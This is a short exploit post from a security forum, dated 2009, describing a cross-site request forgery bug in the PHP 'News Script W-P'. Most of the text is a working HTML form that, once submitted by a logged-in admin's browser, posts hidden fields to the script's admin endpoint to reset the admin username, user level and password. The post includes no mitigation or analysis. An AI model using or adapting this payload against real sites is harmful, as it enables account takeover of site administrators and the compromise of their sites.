News Script W-P Change Admin pass ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > News Script W-P Change Admin pass ~ XSRF Vuln.

Madde
	Author : Bug Researchers/Fl0riX
	Date : 04.11.2009 23:53:25
	# News Script W-P Change Admin pass ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name :News Script W-P # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin bilgileri degistirebilinir. # author : Fl0riX - Bug Researchers # Demo : http://www.web-php.de/demo/100017/event.php ############################################################# < ------------------- header data end of ------------------- > <form name=Formular method=post onsubmit=return chkFormular() action=http://www.site.com/[path]/10003/news_intern.php> <input type=hidden name=action value=user_anlegen> <input type=hidden name=senden value=99> <input type=hidden name=aus value=1> <input type=hidden name=user_id value=1> <input type=radio name=userlevel value=0> <input type=radio name=userlevel value=1 > <input type=radio name=userlevel value=2 > <input type=radio name=userlevel value=3checked >Can everything <input type=text class=input name=username size=30value=admin> <input type=text class=input name=email size=30value=> <input class=inputtype=password name=passwort size=30 value=1212124onBlur=if (value ==’’) {value = ’1212124’} onFocus=if (value == ’1212124’) {value =’’} /> <input type=submit class=ab value=fl0baba name=B1> </form> < -- bug code end of -- >